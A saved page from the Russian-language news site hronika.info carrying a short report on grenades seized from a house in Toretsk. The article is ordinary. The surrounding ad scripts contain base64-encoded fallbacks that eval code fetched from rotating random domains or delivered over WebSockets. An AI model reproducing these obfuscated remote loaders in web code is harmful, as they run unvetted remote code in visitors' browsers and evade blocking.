<!DOCTYPE html>
<html>
  
  <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>На Донбассе в жилом доме нашли боеприпасы</title>
<meta name="description" content="Женщина объяснила, что боеприпасы остались ей в наследство от умершего брата. " />
<meta name="keywords" content="" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Хроника мировых событий" />
<meta property="og:type" content="article" />
<meta property="og:title" content="На Донбассе в жилом доме нашли боеприпасы" />
<meta property="og:url" content="http://hronika.info/ukraina/324122-na-donbasse-v-zhilom-dome-nashli-boepripasy.html" />
<meta property="og:image" content="http://hronika.info/uploads/posts/2018-06/thumbs/1528473480_2160257.jpg" />
<link rel="search" type="application/opensearchdescription+xml" href="http://hronika.info/engine/opensearch.php" title="Хроника мировых событий" />
<link rel="alternate" type="application/rss+xml" title="Хроника мировых событий" href="http://hronika.info/rss.xml" />
<script type="text/javascript" src="/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="/engine/classes/js/bbcodes.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
<script type="text/javascript" src="/engine/editor/scripts/webfont.js"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
    <link rel="icon" type="image/png" href="/favicon.png" />
    <link rel="apple-touch-favicon" href="/apple-touch-favicon.png"/>
    <link media="screen" href="/templates/hronika/css/engine.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/orating.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/css.css" type="text/css" rel="stylesheet" />
    <meta property="fb:admins" content="490214530991726"/>  
    <meta property="fb:app_id" content="574441425949200"/>  
    <meta name="4309768020df0301dc59380bc0812f0f" content="">
    <script type="text/javascript">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</script>
<meta name="teasercash-site-verification" content="teasercash-site-833" />
  </head>

  <body><script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'hronika';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
	FastSearch();
});
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = '/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9393887096432784",
    enable_page_level_ads: true
  });
</script>
    
    <header id="header" class="bshadow">
      <div class="maxw"><div class="logowrap


ukraina_2


















">
    <div class="logo"><img src="/templates/hronika/images/logo.png" alt="Хроника мировых событий" style="width: 100%;" /></div>
    
</div>	      <a href="/" class="index"></a>
			<nav class="top-menu bshadow">
				<ul>
					<li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
                    <li><a href="/obwestvo/" >Общество</a></li>
                    <li><a href="/kultura/" >Культура</a></li>
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/medicina/" >Медицина</a></li>
                    <li><a href="/nedvizhimost/" >Недвижимость</a></li>
					<li><a href="/videonovosti/" >Видеоновости</a></li>						
				</ul>					
				<ul>
                    <li class="tm-selected"><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
                    <li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/igry/" >Игры</a></li>                    					
				    <li><a href="/kriminal/" >Происшествия</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>
					<li><a href="/kurjozy/" >Курьезы</a></li>
					<li><a href="/mnenia/" >Мнения</a></li>
				</ul>
			</nav>
            <div class="reklright"></div>
      </div>
      </header>
      <div id="wrcont">

	  <!--noindex--><!--/noindex-->
       
        <div class="google-top-center"><!-- noindex -->
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Под меню заглушка -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5011853349"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<!--/noindex--></div>
        <section id="middle">
          <div class="clr"><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/" itemprop="url"><span itemprop="title">Хроника событий</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/ukraina/" itemprop="url"><span itemprop="title">Украина</span></a></span> &raquo; На Донбассе в жилом доме нашли боеприпасы</span></div></div>
          <div id="container">
            <div id="content2">
 

              <article>

			   <div id='dle-content'>

<div class="full-story">
 <div class="mainc fullimg200_150">
  <div class="full-storyttl">
  <div class="fullinfo"></div>
   <div class="fullargcat"><b>Раздел:&nbsp;</b><strong><a href="http://hronika.info/ukraina/">Украина</a></strong>&nbsp;&nbsp;</div>
   <div class="orating ignore-select" id="orating-324122">
	<a href="#" class="orating_m" title="Не нравится" onclick="orating(324122,0);return false;"></a>
	<a href="#" class="orating_p" title="Нравится" onclick="orating(324122,1);return false;"></a>
	<a href="#" class="orating_res" onclick="ostats(324122,1,true);return false;">0</a>
</div>


  </div>
		<div class="ttl_h1full"><h1><span id="news-title">На Донбассе в жилом доме нашли боеприпасы</span></h1></div>
     
<div class="ax-full _ga1_on_">
	<!--TBegin:http://hronika.info/uploads/posts/2018-06/1528473480_2160257.jpg|left--><a href="http://hronika.info/uploads/posts/2018-06/1528473480_2160257.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-06/thumbs/1528473480_2160257.jpg" style="float:left;" alt='На Донбассе в жилом доме нашли боеприпасы' title='На Донбассе в жилом доме нашли боеприпасы'  /></a><!--TEnd--><b>Женщина объяснила, что боеприпасы остались ей "в наследство" от умершего брата. <br /></b><br />В городе Торецк (бывший Дзержинск) сотрудники полиции изъяли две гранаты в жилом доме. Об этом передает интернет-издание <a href="http://hronika.info/">Хроника.инфо</a> со ссылкой на<a href="https://korrespondent.net/ukraine/3978748-v-toretske-v-zhylom-dome-nashly-hranaty" target="_blank"> Корреспондент</a>.<br /><br />"В ходе осмотра частного дома оперативники обнаружили в хозяйственном помещении гранаты РГД-5 и Ф-1. Женщина объяснила, что боеприпасы остались от умершего брата", – говорится в сообщении.<br /><br />Изъятые боеприпасы направлены на экспертизу. Полицейские устанавливают происхождение гранат.<br /><br /><b>Читайте также: <a href="http://hronika.info/ukraina/87217-pod-harkovom-progremel-vzryv-v-zhilom-dome.html" >Под Харьковом прогремел взрыв в жилом доме</a><br /></b><br />По данному факту возбудили уголовное производство по статье о незаконном обращении с оружием и боеприпасами (ч.1 ст.263 УК Украины). Санкция статьи предусматривает от 3 до 7 лет.
	<div class="ctrlE">Если вы нашли ошибку в тексте, выделите её мышью и нажмите Ctrl+Enter</div>
</div>
<div class="clr"><br /><p class="basetags">&nbsp;<i>Теги: <a href="http://hronika.info/tags/%D0%94%D0%BE%D0%BD%D0%B1%D0%B0%D1%81%D1%81/">Донбасс</a>, <a href="http://hronika.info/tags/%D0%B3%D1%80%D0%B0%D0%BD%D0%B0%D1%82%D0%B0/">граната</a></i></p></div>
<div class="full-top_banner">
    <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10323">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10323/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
    </div>
<div class="full-top_banner">
    <div id="MIXADV_1444" class="MIXADVERT_NET"></div>
          <script> 
          var node1444 = document.getElementById("MIXADV_1444");
          if( node1444 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=1444&r="+Math.random();
               node1444.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBkYXRlX251bWJlciA9IGRhdGUuZ2V0RGF0ZSgpIC0gMTt2YXIgbWFzID0gWyAiMXd3WVp4bnFNZy5zcGFjZSIsIndlOHg0OGh4ZzB4LmluZm8iLCIzYmxjdmpzamh5NS5pbmZvIiwiOWRrY3BweXhocy5zaXRlIiwiYmg4OWxxZnJkNTIuaW5mbyIsIjBhcWxvMmN0Zi5wcm8iLCJteXZ6dWM4Y3VtLnNpdGUiLCJwc2E5ZTljbzR0LnNwYWNlIiwiNnhwZHpiM2x2di5zaXRlIiwiWXVPNWxta2NWQy5zaXRlIiwibHAwemw2M253MzIuc2l0ZSIsIjJ6eWtpaXVncC5wcm8iLCJyYm1kbHZ1NXlnaS5zaXRlIiwiNXBwa3BmNHhweGIuc3BhY2UiLCJsNmhiYTdzb3NtMS5zaXRlIiwiZWo2YmVvd3VrenUuc3BhY2UiLCIyYTl6bDJ2OW4ucHJvIiwibndvazJpcXh2ZWwuc3BhY2UiLCJ4NGJ2emV1NzRqMS5zaXRlIiwidGpsZ2ZkZm5rLnRlY2giLCIyOGZhZXB0cTcudGVjaCIsInJybmhiODYzai50ZWNoIiwiYWs3MmV2aWljOW0uc2l0ZSIsImJrYmIzMTZmangzLnNwYWNlIiwiaWE3aWVrcXJuNXAuc2l0ZSIsIjJmNjFqdXB4ZHB2LnNwYWNlIiwieDl6eHEydXdqbXMuc2l0ZSIsImNxNDc1a2tubDd0aHpmLnRvcCIsImluaHo0OXhocGhhcjVrLnRvcCIsInM3c2R0Z3o3enJlNW1zLnRvcCIgXTtpZiggbWFzLmxlbmd0aCA8PSBkYXRlX251bWJlciApIHZhciBob3N0ID0gbWFzW01hdGguZmxvb3IoIGRhdGVfbnVtYmVyIC8gMiApXTsgZWxzZSB2YXIgaG9zdCA9IG1hc1tkYXRlX251bWJlcl07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgNSk7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDE0NDQgKiBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIityK2RlbHRhK2lkKyIiOyBub2RlMTQ0NC5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7") );
              }
          }
          </script>
    <!-- noindex -->
<!-- M225926Composite Start --> <div id="M225926Composite608873"><center> <a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a> </center></div> <script type="text/javascript"> var d = new Date, script608873 = document.createElement("script"), mg_ws608873 = {};script608873.type = "text/javascript";script608873.charset = "utf-8";script608873.src = "//jsc.marketgid.com/h/r/hronika.info.608873.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script608873.onerror = function () { mg_ws608873 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MDg4NzMoZSl7dmFyIGg9bWdfd3M2MDg4NzMub25tZXNzYWdlOyBtZ193czYwODg3My5yZWFkeVN0YXRlPT1tZ193czYwODg3My5DTE9TRUQmJihtZ193czYwODg3Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjA4ODczX2xvY2F0aW9uKSksbWdfd3M2MDg4NzMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMobWdfd3M2MDg4NzMsZnVuY3Rpb24oKXttZ193czYwODg3My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MDg4NzNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYwODg3MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MDg4NzNfbG9jYXRpb24pLCBtZ193czYwODg3My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MDg4NzMoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws608873.onmessage = function (msg){window.eval(msg.data);}; mg_ws608873.postMessage('js|'+script608873.src+'|M225926Composite608873|M225926Composite608873');};document.body.appendChild(script608873); </script> <!-- M225926Composite End -->
<!--/ noindex -->
    <!-- noindex -->
<div id="CNM4058" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM4058t" style="display:none" rel="nofollow" target="_blank"><strong>Новости</strong></a></div>

<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM4058');
  if (el) {
    if (document.getElementById('CNM4058t').style.display == 'none') {
      document.getElementById('CNM4058t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/4058?v='+t;
      el.parentNode.appendChild(NMces);
    }
  }
</script>
<!--/ noindex -->
    <!-- start NEW content_v1 for hronika.info -->
<div id="adpartner-jsunit-851">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=851&" + Math.random();
        head.appendChild(script);
    </script>
</div>

<!-- end NEW content_v1 for hronika.info -->
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9393887096432784",
          enable_page_level_ads: true
     });
</script>
    <script id="r17724" type="text/javascript">
    (function() {
        var worker17724,
            tickerID = 17724,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17724.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17724.postMessage(data);
                }

                worker17724 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17724.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17724.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
    <div id="X8c86T6aTLG1gJQPzRFC" data-type="0" class="blockOfO1b2l3" ></div>
    <div id="bn_aa922818e6">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.aa922818e6.js"></script>
     </div>
<div class="f_bottm">
 <div class="f_date_author">Сегодня, 19:05 » Автор: <a onclick="ShowProfile('%D0%A2%D0%B0%D1%82%D1%8C%D1%8F%D0%BD%D0%B0+%D0%9B%D0%B0%D1%80%D0%B8%D0%BD%D0%B0', 'http://hronika.info/user/%D0%A2%D0%B0%D1%82%D1%8C%D1%8F%D0%BD%D0%B0+%D0%9B%D0%B0%D1%80%D0%B8%D0%BD%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%A2%D0%B0%D1%82%D1%8C%D1%8F%D0%BD%D0%B0+%D0%9B%D0%B0%D1%80%D0%B8%D0%BD%D0%B0/">Татьяна Ларина</a></div> 
 <div class="view_comments">  
  <div class="f_views"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;198</div>
  <div class="f_comments"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0</div> 
  </div>
</div>
	</div>    
<div class="sb">
<div class="sotsseti">
<!-- noindex -->
  <script type="text/javascript">(function() {
      if (window.pluso) {return};
       var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
       s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
       s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://x.pluso.ru/pluso-x.js';
       var h=d[g]('body')[0];
       h.appendChild(s);
    })();
 </script>
<div class="pluso-engine" pluso-sharer={"buttons":"facebook,twitter,google,vkontakte,moimir,email,print,more","style":{"size":"small","shape":"square","theme":"theme03","css":""},"orientation":"horizontal","multiline":false} ></div> 
<!-- /noindex -->
    
<div class="sotslikes">
<!-- Код рейтинга -->

</div>
</div>
 <div class="fullstoryn">
   <div class="bshadow exban"> 

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Рекомендуемый под новостью -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="6534414543"
     data-ad-format="autorelaxed"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
           <div class="clr"></div>
    </div>
 </div>
  <div class="clr"></div>
  <div class="fullstoryn">
   <div class="bshadow exban">
  
    
   <div class="clr"></div>
    </div>
 </div>  
</div><br/>

<div class="related-n"> 
<div class="relttl"><h2>Похожие новости по теме</h2></div>
         <div class="clr"></div>
<div class="related_news bshadow"><a href="http://hronika.info/ukraina/275302-na-donbasse-obnaruzhili-avtomobil-so-vzryvchatkoy.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-11/1510869285_2081158.jpg" alt="На Донбассе обнаружили автомобиль со взрывчаткой" title="На Донбассе обнаружили автомобиль со взрывчаткой" /></a>
    <strong title="На Донбассе обнаружили автомобиль со взрывчаткой"><a href="http://hronika.info/ukraina/275302-na-donbasse-obnaruzhili-avtomobil-so-vzryvchatkoy.html">На Донбассе обнаружили автомобиль со взрывчаткой</a></strong>
  <p>Правоохранители выясняют, кому предназначались боеприпасы.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/ukraina/170303-v-kieve-ostanovili-mikroavtobus-s-arsenalom-oruzhiya.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-09/thumbs/1473798493_1473763981-9003.jpg" alt="В Киеве остановили микроавтобус с арсеналом оружия" title="В Киеве остановили микроавтобус с арсеналом оружия" /></a>
    <strong title="В Киеве остановили микроавтобус с арсеналом оружия"><a href="http://hronika.info/ukraina/170303-v-kieve-ostanovili-mikroavtobus-s-arsenalom-oruzhiya.html">В Киеве остановили микроавтобус с арсеналом оружия</a></strong>
  <p>В Деснянском районе Киева полицейские в микроавтобусе нашли боеприпасы и взрывчатое вещество.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/ukraina/162301-v-volynskoy-oblasti-u-boyca-nashli-oruzhie-i-boepripasy.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-08/1470761713_56_main.jpg" alt="В Волынской области у бойца нашли оружие и боеприпасы" title="В Волынской области у бойца нашли оружие и боеприпасы" /></a>
    <strong title="В Волынской области у бойца нашли оружие и боеприпасы"><a href="http://hronika.info/ukraina/162301-v-volynskoy-oblasti-u-boyca-nashli-oruzhie-i-boepripasy.html">В Волынской области у бойца нашли оружие и боеприпасы</a></strong>
  <p>Полиция возбудила уголовное дело</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/ukraina/130015-v-hersone-progremel-vzryv-v-zhilom-dome.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-03/thumbs/1458484208_vzrv.jpg" alt="В Херсоне прогремел взрыв в жилом доме" title="В Херсоне прогремел взрыв в жилом доме" /></a>
    <strong title="В Херсоне прогремел взрыв в жилом доме"><a href="http://hronika.info/ukraina/130015-v-hersone-progremel-vzryv-v-zhilom-dome.html">В Херсоне прогремел взрыв в жилом доме</a></strong>
  <p>В результате взрыва пострадал 33-летний мужчина.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/ukraina/87217-pod-harkovom-progremel-vzryv-v-zhilom-dome.html">
  <img src="/posters/110_85_80_1/uploads/posts/2015-09/1442919916_mhs.jpg" alt="Под Харьковом прогремел взрыв в жилом доме" title="Под Харьковом прогремел взрыв в жилом доме" /></a>
    <strong title="Под Харьковом прогремел взрыв в жилом доме"><a href="http://hronika.info/ukraina/87217-pod-harkovom-progremel-vzryv-v-zhilom-dome.html">Под Харьковом прогремел взрыв в жилом доме</a></strong>
  <p>В Харькове дом взлетел на воздух.</p><div class="clr"></div>
</div>
 
<div style="clear: both"></div>
</div>
         <div class="clr"></div>

<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="poslednie-n">
<div class="relttl"><h2>Поcледние новости раздела category}</h2></div>
<div class="bshadow">
<div class="poslednie_div49-5 fleft">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div class="poslednie_div49-5 fright">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div style="clear: both"></div>
</div>
</div>-->

<!--<div style="clear: both"></div>
<div class="sovetuemsmotret">
<div class="relttl"><h2>Также советуем посмотреть</h2></div>
      <div class="slwrap3 bshadow">
      <div id="slider3">
        <a class="buttons prev" href="#"></a>
        <div class="viewport">
          <ul class="overview"><li class="listalkafull_n">
    <a href="http://hronika.info/ekonomika/678-kipr-v-ozhidanii-kreditnoy-pomoschi.html"><img src="/posters/167_120_50_1/uploads/posts/2013-04/1365935837_kipr-v-ozhydanii.jpeg" alt="Кипр в ожидании кредитной помощи" class="l_n_im" title="Кипр в ожидании кредитной помощи" />
</a>
<strong class="ttl" title="Кипр в ожидании кредитной помощи"><a href="http://hronika.info/ekonomika/678-kipr-v-ozhidanii-kreditnoy-pomoschi.html">Кипр в ожидании кредитной помощи</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/rossija/345-proverki-npo-mogut-ploho-otrazitsya-na-mezhdunarodnom-imidzhe-rossii.html"><img src="/posters/167_120_50_1/uploads/posts/2013-03/1364581571_zagruzhennoe.jpg" alt="Проверки НПО могут плохо отразиться на международном имидже России" class="l_n_im" title="Проверки НПО могут плохо отразиться на международном имидже России" />
</a>
<strong class="ttl" title="Проверки НПО могут плохо отразиться на международном имидже России"><a href="http://hronika.info/rossija/345-proverki-npo-mogut-ploho-otrazitsya-na-mezhdunarodnom-imidzhe-rossii.html">Проверки НПО могут плохо отразиться на международном имидже России</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mir/333-yuzhnaya-koreya-privela-rakety-v-boevuyu-gotovnost.html"><img src="/posters/167_120_50_1/uploads/posts/2013-03/1364553899_zagruzhennoe.jpg" alt="Северная Корея привела ракеты в боевую готовность" class="l_n_im" title="Северная Корея привела ракеты в боевую готовность" />
</a>
<strong class="ttl" title="Северная Корея привела ракеты в боевую готовность"><a href="http://hronika.info/mir/333-yuzhnaya-koreya-privela-rakety-v-boevuyu-gotovnost.html">Северная Корея привела ракеты в боевую готовность</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/medicina/37-uchenye-somnevayutsya-v-polze-organicheskih-produktov.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348091272_uchenye-somnevautsa-v-polze-organicheskih-produktov.jpg" alt="Ученые сомневаются в пользе органических продуктов" class="l_n_im" title="Ученые сомневаются в пользе органических продуктов" />
</a>
<strong class="ttl" title="Ученые сомневаются в пользе органических продуктов"><a href="http://hronika.info/medicina/37-uchenye-somnevayutsya-v-polze-organicheskih-produktov.html">Ученые сомневаются в пользе органических продуктов</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mir/29-v-amsterdame-zakryvayut-25-kvartalov-krasnyh-fonarey.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348088503_v-amsterdame-zakryvajut-kvartal-krasnyh-fonarej.jpg" alt="В Амстердаме закрывают 25% кварталов красных фонарей" class="l_n_im" title="В Амстердаме закрывают 25% кварталов красных фонарей" />
</a>
<strong class="ttl" title="В Амстердаме закрывают 25% кварталов красных фонарей"><a href="http://hronika.info/mir/29-v-amsterdame-zakryvayut-25-kvartalov-krasnyh-fonarey.html">В Амстердаме закрывают 25% кварталов красных фонарей</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mir/28-kanada-prekraschaet-s-iranom-diplomaticheskie-otnosheniya.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348088260_kanada-prekraschaet-s-iranom-diplomaticheskie-otnoshenija.jpg" alt="Канада прекращает с Ираном дипломатические отношения" class="l_n_im" title="Канада прекращает с Ираном дипломатические отношения" />
</a>
